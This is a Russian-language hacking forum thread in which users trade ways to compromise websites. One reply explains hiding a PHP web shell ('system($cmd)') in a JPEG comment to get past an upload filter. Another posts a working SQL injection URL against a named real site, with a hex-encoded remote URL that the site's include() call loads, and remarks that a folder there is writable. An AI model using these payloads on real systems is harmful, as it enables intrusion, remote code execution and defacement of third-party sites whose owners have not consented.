Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое
2 - можно. Разницы то никакой нет
лол
http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e6 1726f642e72752f616e746963686174/*&id=0&id_=-0.015
в другом параметре запрос с 1 столбцом
из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php
0x687474703a2f2f7a69726f6461792e6e61726f642e72752f 616e746963686174
это переведённое в хекс http://ziroday.narod.ru/antichat
вот и всё =)
ЗЫ В папку forum есть запись
Спудер опередил...
ОФФТОП:
В странице индекс.пхп :
Код:
if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo("
// <SCRIPT type='text/javascript'>
// alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.');
// window.location='http://www.pornushka.ru';
// </SCRIPT>
// ");}
Вот это рыбаки!!! )))))))))))
P.S ничего не дефейсить. Убью.